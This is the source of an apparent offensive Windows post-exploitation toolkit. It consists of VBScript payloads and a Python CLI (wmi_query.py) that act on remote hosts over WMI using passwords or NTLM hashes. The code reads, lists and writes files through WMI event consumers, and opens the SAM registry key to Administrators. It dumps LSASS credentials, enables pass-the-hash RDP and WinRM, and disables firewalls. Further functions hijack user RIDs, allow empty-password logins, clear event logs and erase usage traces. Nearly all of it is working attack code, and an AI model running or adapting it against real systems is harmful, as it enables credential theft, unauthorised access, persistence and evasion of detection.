-------------------------------------------------------------------------------- 1 | Function btoa(sourceStr) 2 | Dim i, j, n, carr, rarr(), a, b, c 3 | carr = Array("A", "B", "C", "D", "E", "F", "G", "H", _ 4 | "I", "J", "K", "L", "M", "N", "O" ,"P", _ 5 | "Q", "R", "S", "T", "U", "V", "W", "X", _ 6 | "Y", "Z", "a", "b", "c", "d", "e", "f", _ 7 | "g", "h", "i", "j", "k", "l", "m", "n", _ 8 | "o", "p", "q", "r", "s", "t", "u", "v", _ 9 | "w", "x", "y", "z", "0", "1", "2", "3", _ 10 | "4", "5", "6", "7", "8", "9", "+", "/") 11 | n = Len(sourceStr)-1 12 | ReDim rarr(n\3) 13 | For i=0 To n Step 3 14 | a = AscW(Mid(sourceStr,i+1,1)) 15 | If i < n Then 16 | b = AscW(Mid(sourceStr,i+2,1)) 17 | Else 18 | b = 0 19 | End If 20 | If i < n-1 Then 21 | c = AscW(Mid(sourceStr,i+3,1)) 22 | Else 23 | c = 0 24 | End If 25 | rarr(i\3) = carr(a\4) & carr((a And 3) * 16 + b\16) & carr((b And 15) * 4 + c\64) & carr(c And 63) 26 | Next 27 | i = UBound(rarr) 28 | If n Mod 3 = 0 Then 29 | rarr(i) = Left(rarr(i),2) & "==" 30 | ElseIf n Mod 3 = 1 Then 31 | rarr(i) = Left(rarr(i),3) & "=" 32 | End If 33 | btoa = Join(rarr,"") 34 | End Function 35 | 36 | 37 | Function char_to_utf8(sChar) 38 | Dim c, b1, b2, b3 39 | c = AscW(sChar) 40 | If c < 0 Then 41 | c = c + &H10000 42 | End If 43 | If c < &H80 Then 44 | char_to_utf8 = sChar 45 | ElseIf c < &H800 Then 46 | b1 = c Mod 64 47 | b2 = (c - b1) / 64 48 | char_to_utf8 = ChrW(&HC0 + b2) & ChrW(&H80 + b1) 49 | ElseIf c < &H10000 Then 50 | b1 = c Mod 64 51 | b2 = ((c - b1) / 64) Mod 64 52 | b3 = (c - b1 - (64 * b2)) / 4096 53 | char_to_utf8 = ChrW(&HE0 + b3) & ChrW(&H80 + b2) & ChrW(&H80 + b1) 54 | Else 55 | End If 56 | End Function 57 | 58 | Function str_to_utf8(sSource) 59 | Dim i, n, rarr() 60 | n = Len(sSource) 61 | ReDim rarr(n - 1) 62 | For i=0 To n-1 63 | rarr(i) = char_to_utf8(Mid(sSource,i+1,1)) 64 | Next 65 | str_to_utf8 = Join(rarr,"") 66 | End Function 67 | 68 | Function str_to_base64(sSource) 69 | str_to_base64 = 
btoa(str_to_utf8(sSource)) 70 | End Function 71 | 72 | Set objFileToRead = CreateObject("Scripting.FileSystemObject").OpenTextFile("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",1) 73 | strFileText = objFileToRead.ReadAll() 74 | b64text = str_to_base64(strFileText) 75 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 76 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 77 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 78 | Set asec = temp.spawninstance_ 79 | asec.name="BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" 80 | Asec.scriptingengine="vbscript" 81 | Asec.scripttext = b64text 82 | asecpath=asec.put_ -------------------------------------------------------------------------------- /vbs/listdir.vbs: -------------------------------------------------------------------------------- 1 | Function Base64Decode(ByVal vCode) 2 | Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") 3 | oNode.dataType = "bin.base64" 4 | oNode.text = vCode 5 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 6 | Set oNode = Nothing 7 | End Function 8 | 9 | Function Stream_BinaryToString(Binary) 10 | Set BinaryStream = CreateObject("ADODB.Stream") 11 | BinaryStream.Type = 1 12 | BinaryStream.Open 13 | BinaryStream.Write Binary 14 | BinaryStream.Position = 0 15 | BinaryStream.Type = 2 16 | ' All Format => utf-16le - utf-8 - utf-16le 17 | BinaryStream.CharSet = "utf-8" 18 | Stream_BinaryToString = BinaryStream.ReadText 19 | Set BinaryStream = Nothing 20 | End Function 21 | 22 | Dim sFolder, sExt, message 23 | sFolder = Base64Decode("AAAAAAAAAAAAAAAAAAAA") 24 | 25 | Dim fs, oFolder, oFiles, oSubFolders 26 | set fs = CreateObject("Scripting.FileSystemObject") 27 | IF (fs.FolderExists(sFolder)) Then 28 | set oFolder = fs.GetFolder(sFolder) 29 | set oSubFolders = oFolder.SubFolders 30 | outdata = "" 31 | for each folder in oSubFolders 32 | message = "Folder:" & folder 33 | outdata = outdata & message & vbCrLf 34 | Next 35 
| 36 | set oFiles = oFolder.Files 37 | for each file in oFiles 38 | sExt = fs.GetExtensionName(file) 39 | sExt = LCase(sExt) 40 | message = "FileName:" & file.Name & ", Extension :" & sExt 41 | outdata = outdata & message & vbCrLf 42 | Next 43 | ELSE 44 | Base64Encode = "UmFpZEVuTWVpOllvdSBhcmUgcHJvbXB0ZWQgdGhhdCB0aGUgZmlsZSBkb2VzIG5vdCBleGlzdA==" 45 | END IF 46 | 47 | Function btoa(sourceStr) 48 | Dim i, j, n, carr, rarr(), a, b, c 49 | carr = Array("A", "B", "C", "D", "E", "F", "G", "H", _ 50 | "I", "J", "K", "L", "M", "N", "O" ,"P", _ 51 | "Q", "R", "S", "T", "U", "V", "W", "X", _ 52 | "Y", "Z", "a", "b", "c", "d", "e", "f", _ 53 | "g", "h", "i", "j", "k", "l", "m", "n", _ 54 | "o", "p", "q", "r", "s", "t", "u", "v", _ 55 | "w", "x", "y", "z", "0", "1", "2", "3", _ 56 | "4", "5", "6", "7", "8", "9", "+", "/") 57 | n = Len(sourceStr)-1 58 | ReDim rarr(n\3) 59 | For i=0 To n Step 3 60 | a = AscW(Mid(sourceStr,i+1,1)) 61 | If i < n Then 62 | b = AscW(Mid(sourceStr,i+2,1)) 63 | Else 64 | b = 0 65 | End If 66 | If i < n-1 Then 67 | c = AscW(Mid(sourceStr,i+3,1)) 68 | Else 69 | c = 0 70 | End If 71 | rarr(i\3) = carr(a\4) & carr((a And 3) * 16 + b\16) & carr((b And 15) * 4 + c\64) & carr(c And 63) 72 | Next 73 | i = UBound(rarr) 74 | If n Mod 3 = 0 Then 75 | rarr(i) = Left(rarr(i),2) & "==" 76 | ElseIf n Mod 3 = 1 Then 77 | rarr(i) = Left(rarr(i),3) & "=" 78 | End If 79 | btoa = Join(rarr,"") 80 | End Function 81 | 82 | 83 | Function char_to_utf8(sChar) 84 | Dim c, b1, b2, b3 85 | c = AscW(sChar) 86 | If c < 0 Then 87 | c = c + &H10000 88 | End If 89 | If c < &H80 Then 90 | char_to_utf8 = sChar 91 | ElseIf c < &H800 Then 92 | b1 = c Mod 64 93 | b2 = (c - b1) / 64 94 | char_to_utf8 = ChrW(&HC0 + b2) & ChrW(&H80 + b1) 95 | ElseIf c < &H10000 Then 96 | b1 = c Mod 64 97 | b2 = ((c - b1) / 64) Mod 64 98 | b3 = (c - b1 - (64 * b2)) / 4096 99 | char_to_utf8 = ChrW(&HE0 + b3) & ChrW(&H80 + b2) & ChrW(&H80 + b1) 100 | Else 101 | End If 102 | End Function 103 | 104 | Function 
str_to_utf8(sSource) 105 | Dim i, n, rarr() 106 | n = Len(sSource) 107 | ReDim rarr(n - 1) 108 | For i=0 To n-1 109 | rarr(i) = char_to_utf8(Mid(sSource,i+1,1)) 110 | Next 111 | str_to_utf8 = Join(rarr,"") 112 | End Function 113 | 114 | Function str_to_base64(sSource) 115 | str_to_base64 = btoa(str_to_utf8(sSource)) 116 | End Function 117 | 118 | Base64Encode = str_to_base64(outdata) 119 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 120 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 121 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 122 | Set asec = temp.spawninstance_ 123 | asec.name="BBBBBBBBBBBBBBBBBBBBBBB" 124 | Asec.scriptingengine="vbscript" 125 | Asec.scripttext = Base64Encode 126 | asecpath=asec.put_ -------------------------------------------------------------------------------- /vbs/readfile.vbs: -------------------------------------------------------------------------------- 1 | Function Base64Decode(ByVal vCode) 2 | Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64") 3 | oNode.dataType = "bin.base64" 4 | oNode.text = vCode 5 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 6 | Set oNode = Nothing 7 | End Function 8 | 9 | Function Stream_BinaryToString(Binary) 10 | Set BinaryStream = CreateObject("ADODB.Stream") 11 | BinaryStream.Type = 1 12 | BinaryStream.Open 13 | BinaryStream.Write Binary 14 | BinaryStream.Position = 0 15 | BinaryStream.Type = 2 16 | ' All Format => utf-16le - utf-8 - utf-16le 17 | BinaryStream.CharSet = "utf-8" 18 | Stream_BinaryToString = BinaryStream.ReadText 19 | Set BinaryStream = Nothing 20 | End Function 21 | 22 | Set fso=CreateObject("Scripting.FileSystemObject") 23 | FilePath = Base64Decode("AAAAAAAAAAAAAAAAAAAAA") 24 | If fso.fileExists(FilePath) Then 25 | Set objStream = CreateObject("ADODB.Stream") 26 | objStream.Type = 1 'Binary 27 | objStream.Open 28 | objStream.LoadFromFile FilePath 29 | data = objStream.Read 30 | Set oXML 
= CreateObject("Msxml2.DOMDocument") 31 | Set oNode = oXML.CreateElement("base64") 32 | oNode.dataType = "bin.base64" 33 | oNode.nodeTypedValue = data 34 | Base64Encode = oNode.text 35 | Else 36 | Base64Encode = "UmFpZEVuTWVpOllvdSBhcmUgcHJvbXB0ZWQgdGhhdCB0aGUgZmlsZSBkb2VzIG5vdCBleGlzdA==" 37 | End If 38 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 39 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 40 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 41 | Set asec = temp.spawninstance_ 42 | asec.name="BBBBBBBBBBBBBBBBBBBBBBB" 43 | Asec.scriptingengine="vbscript" 44 | Asec.scripttext = Base64Encode 45 | asecpath=asec.put_ -------------------------------------------------------------------------------- /vbs/reg_permission.vbs: -------------------------------------------------------------------------------- 1 | Set objWMIService = GetObject("winmgmts:\\.\root\Cimv2") 2 | Set objTrustee = objWMIService.Get("Win32_Trustee").SpawnInstance_() 3 | objTrustee.Domain = "BUILTIN" 4 | objTrustee.Name = "Administrators" 5 | objTrustee.SID = Array(1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0) 6 | objTrustee.SidLength = 16 7 | objTrustee.SIDString = "S-1-5-32-544" 8 | 9 | Set objNewACE = objWMIService.Get("Win32_ACE").SpawnInstance_() 10 | objNewACE.AccessMask = 983103 11 | objNewACE.AceType = 0 12 | objNewACE.AceFlags = 2 13 | objNewACE.Trustee = objTrustee 14 | 15 | Const HKLM = &H80000002 16 | strKeyPath = "SAM\SAM" 17 | Set oReg = GetObject("Winmgmts:\root\default:StdRegProv") 18 | RetVal = oReg.GetSecurityDescriptor(HKLM,strKeyPath,wmiSecurityDescriptor) 19 | DACL = wmiSecurityDescriptor.DACL 20 | ReDim objNewDacl(0) 21 | Set objNewDacl(0) = objNewACE 22 | For each objACE in DACL 23 | Ubd = UBound(objNewDacl) 24 | ReDim preserve objNewDacl(Ubd+1) 25 | Set objNewDacl(Ubd+1) = objACE 26 | Next 27 | wmiSecurityDescriptor.DACL = objNewDacl 28 | RetVal = oReg.SetSecurityDescriptor(HKLM,strKeyPath,wmiSecurityDescriptor) 
-------------------------------------------------------------------------------- /vbs/regini.vbs: -------------------------------------------------------------------------------- 1 | set ws=wscript.createobject("wscript.shell") 2 | ret=ws.run ("C:\Windows\System32\regini.exe AAAAAAAAAAAAAAAAAAAAAA" ,3,true) 3 | -------------------------------------------------------------------------------- /vbs/writeFile.vbs: -------------------------------------------------------------------------------- 1 | Function Base64Decode(ByVal vCode) 2 | Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64") 3 | oNode.dataType = "bin.base64" 4 | oNode.text = vCode 5 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 6 | Set oNode = Nothing 7 | End Function 8 | 9 | Function Stream_BinaryToString(Binary) 10 | Set BinaryStream = CreateObject("ADODB.Stream") 11 | BinaryStream.Type = 1 12 | BinaryStream.Open 13 | BinaryStream.Write Binary 14 | BinaryStream.Position = 0 15 | BinaryStream.Type = 2 16 | ' All Format => utf-16le - utf-8 - utf-16le 17 | BinaryStream.CharSet = "utf-8" 18 | Stream_BinaryToString = BinaryStream.ReadText 19 | Set BinaryStream = Nothing 20 | End Function 21 | 22 | Dim xmldoc, node, bytes 23 | Set xmldoc = CreateObject("Msxml2.DOMDocument") 24 | Set node = xmldoc.CreateElement("binary") 25 | node.DataType = "bin.hex" 26 | node.Text = "AAAAAAAAAAAAAAAAAAAAAAAAA" 27 | bytes = node.NodeTypedValue 28 | FilePath = Base64Decode("BBBBBBBBBBBBBBBBBBBBBBB") 29 | Set objStream = CreateObject("ADODB.Stream") 30 | objStream.Type = 1 'Binary 31 | objStream.Open 32 | objStream.Write bytes 33 | objStream.SaveToFile FilePath, 2 'Overwrite 34 | objStream.Close -------------------------------------------------------------------------------- /wmi_query.py: -------------------------------------------------------------------------------- 1 | import module.userquery 2 | import module.getProcessList 3 | import module.rdpsetting 4 | import module.enable_pth_login_rdp 
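import module.winrm_enable
import module.FirewallRule_setting
import module.Firewall_setting
import module.vbsrun
import module.cmdrun
import module.cmdrun2
import module.clearEventLog
import module.dumpLsass
import module.files
import module.listdir
import module.ridhijack
import module.cleartrace
import threading
import logging
import sys
import re
import time
from io import StringIO
import optparse
import colorama


# Every function below is a thin CLI-facing wrapper: it forwards its arguments,
# in positional order, to the matching routine in the ``module`` package.
# ip / username / password / domain / hashes / aesKey are the connection
# parameters shared by all of them and are passed through unchanged.


def getProcessList(ip='', username='', password='', domain='', hashes='', aesKey='', query=False):
    """Forward to module.getProcessList.getProcessList; *query* is passed through as given."""
    module.getProcessList.getProcessList(ip, username, password, domain, hashes, aesKey, query)


def userquery(ip='', username='', password='', domain='', hashes='', aesKey=''):
    """Forward to module.userquery.userquery."""
    module.userquery.userquery(ip, username, password, domain, hashes, aesKey)


def enablerdp(ip='', username='', password='', domain='', hashes='', aesKey='', isenable=0):
    """Forward to module.rdpsetting.enablerdp; *isenable* is passed through uncoerced."""
    module.rdpsetting.enablerdp(ip, username, password, domain, hashes, aesKey, isenable)


def enable_pth_login_rdp(ip='', username='', password='', domain='', hashes='', aesKey='', isenable=0):
    """Forward to module.enable_pth_login_rdp.enable_pth_login_rdp."""
    module.enable_pth_login_rdp.enable_pth_login_rdp(ip, username, password, domain, hashes, aesKey, isenable)


def winrm_enable(ip='', username='', password='', domain='', hashes='', aesKey='', isenable=0):
    """Forward to module.winrm_enable.winrm_enable."""
    module.winrm_enable.winrm_enable(ip, username, password, domain, hashes, aesKey, isenable)


def FirewallRule_setting(ip='', username='', password='', domain='', hashes='', aesKey='', arg=""):
    """Forward to module.FirewallRule_setting.FirewallRule_setting; *arg* is the sub-command string."""
    module.FirewallRule_setting.FirewallRule_setting(ip, username, password, domain, hashes, aesKey, arg)


def Firewall_setting(ip='', username='', password='', domain='', hashes='', aesKey='', arg=""):
    """Forward to module.Firewall_setting.Firewall_setting; *arg* is the sub-command string."""
    module.Firewall_setting.Firewall_setting(ip, username, password, domain, hashes, aesKey, arg)


def vbsrun(ip='', username='', password='', domain='', hashes='', aesKey='', vbsname=''):
    """Forward to module.vbsrun.run_vbs."""
    module.vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, vbsname)


def stopvbs(ip='', username='', password='', domain='', hashes='', aesKey='', vbsid=''):
    """Forward to module.vbsrun.delete.

    An empty *vbsid* or the literal ``"1"`` selects the default id ``"Example"``;
    any other value is passed through unchanged.
    """
    consumer_id = "Example" if vbsid in ("1", "") else vbsid
    module.vbsrun.delete(ip, username, password, domain, hashes, aesKey, consumer_id)


def execute_command(ip='', username='', password='', domain='', hashes='', aesKey='', cmd=''):
    """Run module.cmdrun.exec_command on a daemon thread and wait at most 300 s for it.

    The wrapper returns after the timeout even if exec_command is still running;
    the thread is a daemon, so it does not keep the interpreter alive.
    """
    worker = threading.Thread(
        target=module.cmdrun.exec_command,
        args=(ip, username, password, domain, hashes, aesKey, cmd),
    )
    worker.daemon = True  # Thread.setDaemon() is deprecated since Python 3.10
    worker.start()
    worker.join(300)  # timeout 300s
    if worker.is_alive():
        print("[!] exec_command did not finish within 300s; giving up waiting")


def clear_eventlog(ip='', username='', password='', domain='', hashes='', aesKey='', logname='', id=''):
    """Forward to module.clearEventLog.clear; *id* is passed as a keyword argument."""
    module.clearEventLog.clear(ip, username, password, domain, hashes, aesKey, logname, id=id)


def dump_lsass(ip='', username='', password='', domain='', hashes='', aesKey=''):
    """Forward to module.dumpLsass.dump_lsass."""
    module.dumpLsass.dump_lsass(ip, username, password, domain, hashes, aesKey)


def cmdrun2(ip='', username='', password='', domain='', hashes='', aesKey='', cmd=''):
    """Forward to module.cmdrun2.execcmd; the return value is discarded."""
    module.cmdrun2.execcmd(ip, username, password, domain, hashes, aesKey, cmd)


def _next_prompt_path(execute_result, current_path, tmp_path):
    """Return the ``(current_path, tmp_path)`` pair to use for the next prompt.

    The working directory is read from the third-to-last line of
    *execute_result* (assumed to be the layout execcmd emits in "fake_shell"
    mode — confirm against module.cmdrun2). A line that lacks either a drive
    colon or a backslash is not treated as a path (presumably an error
    message), so the last known good path is reused. With fewer than three
    lines both values are returned unchanged.
    """
    lines = execute_result.split("\n")
    try:
        candidate = lines[-3].rstrip("\r")
    except IndexError:
        # Too little output to carry a path: keep the prompt where it was.
        return current_path, tmp_path
    # Both checks are required; the old form `":" and "\\" not in x` only
    # tested for the backslash because a non-empty literal is always truthy.
    if ":" not in candidate or "\\" not in candidate:
        return tmp_path, tmp_path
    return candidate, candidate


def fake_shell(ip='', username='', password='', domain='', hashes='', aesKey=''):
    """Interactive prompt that runs each typed line through module.cmdrun2.execcmd.

    The prompt shows the working directory recovered from the previous
    command's output; typing ``exit`` leaves the loop. Anything execcmd itself
    prints to stdout is captured and discarded; only the part of its result
    before the first ``[S]`` marker is echoed back.
    """
    print("[*] connect IP:{} fakeshell".format(ip))
    current_path = "C:\\Windows\\System32"
    # Working directory of the last command whose output carried a usable path;
    # the prompt falls back to it when the latest output does not (e.g. an error).
    tmp_path = "C:\\Windows\\System32"
    while True:
        user_cmd = input("{}>".format(current_path))
        if user_cmd == "exit":
            break
        saved_stdout = sys.stdout
        sys.stdout = StringIO()
        try:
            execute_result = module.cmdrun2.execcmd(
                ip, username, password, domain, hashes, aesKey, user_cmd, "fake_shell", current_path
            )
        finally:
            # Restore stdout even if execcmd raises; otherwise the prompt goes silent.
            sys.stdout = saved_stdout
        current_path, tmp_path = _next_prompt_path(execute_result, current_path, tmp_path)
        marker = execute_result.find("[S]")
        # str.find returns -1 when the marker is absent; slicing with -1 would
        # silently drop the last character of the output.
        shown = execute_result if marker < 0 else execute_result[:marker]
        print(shown + "\r\n")


def writeFile(ip='', username='', password='', domain='', hashes='', aesKey='', targetfile='', savetofile=''):
    """Forward to module.files.WriteFile."""
    module.files.WriteFile(ip, username, password, domain, hashes, aesKey, targetfile, savetofile)


def readfile(ip='', username='', password='', domain='', hashes='', aesKey='', targetfile='', savetofile=''):
    """Forward to module.files.readfile."""
    module.files.readfile(ip, username, password, domain, hashes, aesKey, targetfile, savetofile)


def lsdirpath(ip='', username='', password='', domain='', hashes='', aesKey='', targetpath=''):
    """Forward to module.listdir.ls."""
    module.listdir.ls(ip, username, password, domain, hashes, aesKey, targetpath)


def deletefile(ip='', username='', password='', domain='', hashes='', aesKey='', targetfile=''):
    """Forward to module.files.deletefile."""
    module.files.deletefile(ip, username, password, domain, hashes, aesKey, targetfile)


def rdpshadowset(ip='', username='', password='', domain='', hashes='', aesKey='', shadowid=0):
    """Forward to module.rdpsetting.rdpshadow.

    Raises ValueError if *shadowid* is not convertible with int().
    """
    module.rdpsetting.rdpshadow(ip, username, password, domain, hashes, aesKey, int(shadowid))


def rdpnulllogin(ip='', username='', password='', domain='', hashes='', aesKey='', isenable=0):
    """Forward to module.rdpsetting.Login_with_empty_password.

    Raises ValueError if *isenable* is not convertible with int().
    """
    module.rdpsetting.Login_with_empty_password(ip, username, password, domain, hashes, aesKey, int(isenable))


def user_rid_query(ip='', username='', password='', domain='', hashes='', aesKey=''):
    """Forward to module.userquery.user_rid_query."""
    module.userquery.user_rid_query(ip, username, password, domain, hashes, aesKey)


def ridhijack(ip='', username='', password='', domain='', hashes='', aesKey='', ridlist=""):
    """Forward to module.ridhijack.run; *ridlist* is passed through as given."""
    module.ridhijack.run(ip, username, password, domain, hashes, aesKey, ridlist)


def set_user(ip='', username='', password='', domain='', hashes='', aesKey='', ridlist=""):
    """Forward to module.ridhijack.user_set; *ridlist* is passed through as given."""
    module.ridhijack.user_set(ip, username, password, domain,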
hashes, aesKey,ridlist) 130 | 131 | def clear_trace(ip='', username='', password='',domain='',hashes='',aesKey=''): 132 | module.cleartrace.cleartrace(ip, username, password, domain, hashes, aesKey) 133 | 134 | if __name__ == '__main__': 135 | parser=optparse.OptionParser() 136 | parser.add_option("-i",dest="ip",help="target IP") 137 | parser.add_option("-u",dest="username",help="auth username") 138 | parser.add_option("-d",dest="domain",help="target domain") 139 | parser.add_option("-p",dest="password",help="auth password") 140 | parser.add_option("-n",dest="ntlm",help="auth ntlm/lm") 141 | parser.add_option("-g",dest="get_process",action='store_true',help="get process list") 142 | parser.add_option("-q",dest="process_query",action='store_true',help="query Av/EDR/Process") 143 | parser.add_option("-U",dest="user_query",action='store_true',help="user list query") 144 | parser.add_option("-R",dest="enable_rdp",help="enable rdp/disable rdp") 145 | parser.add_option("-E",dest="enable_pth",help="enable rdp pth login") 146 | parser.add_option("-W",dest="enable_winrm",help="enable winrm service") 147 | parser.add_option("-F",dest="netfirewallrule",help="Query/Enable/Disable NetFirewallRule") 148 | parser.add_option("-f",dest="firewall",help="Start/Stop firewall") 149 | parser.add_option("-V",dest="vbs",help="Run vbs") 150 | parser.add_option("--stop_vbs",action="store",dest="stop_vbs",help="stop Default vbs Runing or Stop the id of vbs running") 151 | parser.add_option("--one_vbs_run",dest="one_vbs_run",help="vbs that only runs once") 152 | parser.add_option("--execute_command",dest="execute_command",help="execute command (NT 6.0)") 153 | parser.add_option("--execute_command2",dest="execute_command2",help="execute command") 154 | parser.add_option("--clear_eventlog",dest="clear_eventlog",help="clear event log") 155 | parser.add_option("--cycle_clear",action="store_true",dest="cycle_clear",help="cycle clear eventlog") 156 | 
parser.add_option("--shell",action="store_true",dest="exec2_fake_shell",help="fake shell") 157 | parser.add_option("--writefile",dest="writefile",help="write file") 158 | parser.add_option("--readfile",dest="readfile",help="read file") 159 | parser.add_option("--save-to-file",dest="outfile",help="write file save as path") 160 | parser.add_option("--ls",dest="lsdir",help="Query files and folders of a certain path") 161 | parser.add_option("--dele-file",dest="deletefile",help="remove file") 162 | parser.add_option("--rdp-shadow",dest="rdpshadow",help="rdp shadow setting (-1-Delete Shadow reg key,0-No remote control allowed,1-Full Control with User Rights,2-Full control without user permission,3-View sessions with user permissions,4-View conversations without user permission)") 163 | parser.add_option("--nulllogin",dest="nonelogin",help="Login with empty password") 164 | parser.add_option("--user-rid-query",action="store_true",dest="rid_query",help="Users RID Query") 165 | parser.add_option("--ridhijack",dest="rdihijack",help="RID hijack (--ridhijack ,)") 166 | parser.add_option("--set-user",dest="setuser",help="Enable/Disable User(--setuser ,1/0)") 167 | parser.add_option("--cleartrace",action="store_true",dest="cleartrace",help="Clear usage traces") 168 | (option,args)=parser.parse_args() 169 | ip = option.ip 170 | if option.domain != None: 171 | domain = option.domain 172 | else: 173 | domain = "" 174 | username = option.username 175 | password = option.password 176 | #原本想优化一下这一堆if的,咕咕咕 177 | if option.ip and option.username and (option.password!=None or option.ntlm !=None) and (option.get_process or (option.get_process and option.process_query)): 178 | getProcessList(ip=ip, domain=domain,username=username, password=password,hashes=option.ntlm,query=option.process_query) 179 | elif option.ip and option.username and (option.password!=None or option.ntlm !=None) and option.user_query: 180 | userquery(ip=ip, domain=domain, username=username, 
password=password,hashes=option.ntlm) 181 | elif option.ip and option.username and (option.password!=None or option.ntlm !=None) and option.enable_rdp: 182 | enablerdp(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,isenable=option.enable_rdp) 183 | elif option.ip and option.username and (option.password!=None or option.ntlm !=None) and option.enable_pth: 184 | enable_pth_login_rdp(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,isenable=option.enable_pth) 185 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.enable_winrm: 186 | winrm_enable(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,isenable=option.enable_winrm) 187 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.netfirewallrule: 188 | FirewallRule_setting(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,arg=option.netfirewallrule) 189 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.firewall: 190 | Firewall_setting(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,arg=option.firewall) 191 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.vbs: 192 | vbsrun(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,vbsname=option.vbs) 193 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.stop_vbs: 194 | stopvbs(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,vbsid=option.stop_vbs) 195 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.one_vbs_run: 196 | vbsrun(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,vbsname=option.one_vbs_run) 197 | time.sleep(2) 198 | stopvbs(ip=ip, 
domain=domain, username=username, password=password,hashes=option.ntlm) 199 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.execute_command: 200 | execute_command(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,cmd=option.execute_command) 201 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.clear_eventlog: 202 | clear_eventlog(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm, logname=option.clear_eventlog,id=option.cycle_clear) 203 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.execute_command2: 204 | cmdrun2(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,cmd=option.execute_command2) 205 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.exec2_fake_shell: 206 | fake_shell(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm) 207 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.writefile and option.outfile: 208 | writeFile(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,targetfile=option.writefile,savetofile=option.outfile) 209 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.readfile and option.outfile: 210 | readfile(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,targetfile=option.readfile,savetofile=option.outfile) 211 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.lsdir: 212 | lsdirpath(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,targetpath=option.lsdir) 213 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.deletefile: 214 | deletefile(ip=ip, 
domain=domain, username=username, password=password,hashes=option.ntlm,targetfile=option.deletefile) 215 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.rdpshadow: 216 | rdpshadowset(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,shadowid=option.rdpshadow) 217 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.nonelogin: 218 | rdpnulllogin(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,isenable=option.nonelogin) 219 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.rid_query: 220 | user_rid_query(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm) 221 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.rdihijack: 222 | ridhijack(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,ridlist=option.rdihijack) 223 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.setuser: 224 | set_user(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,ridlist=option.setuser) 225 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and clear_trace: 226 | clear_trace(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm) 227 | else: 228 | print("Usage:\npython wmi_query -i -u -p -g #Get Process List\n" 229 | "python wmi_query -i -u -p -g -q #query Av/EDR/Process\n" 230 | "python wmi_query -i -u -p -U #User Query\n" 231 | "python wmi_query -i -u -p -R 1 #Enable rdp\n" 232 | "python wmi_query -i -u -p -R 0 #Disable rdp\n" 233 | "python wmi_query -i -u -p -R 2 #Query rdp Port\n" 234 | "python wmi_query -i -u -p -E 1 #Enable PTH rdp\n" 235 | "python wmi_query -i -u -p -E 0 #Disable PTH rdp\n" 236 | "python wmi_query -i -u -p -W 1 #Enable 
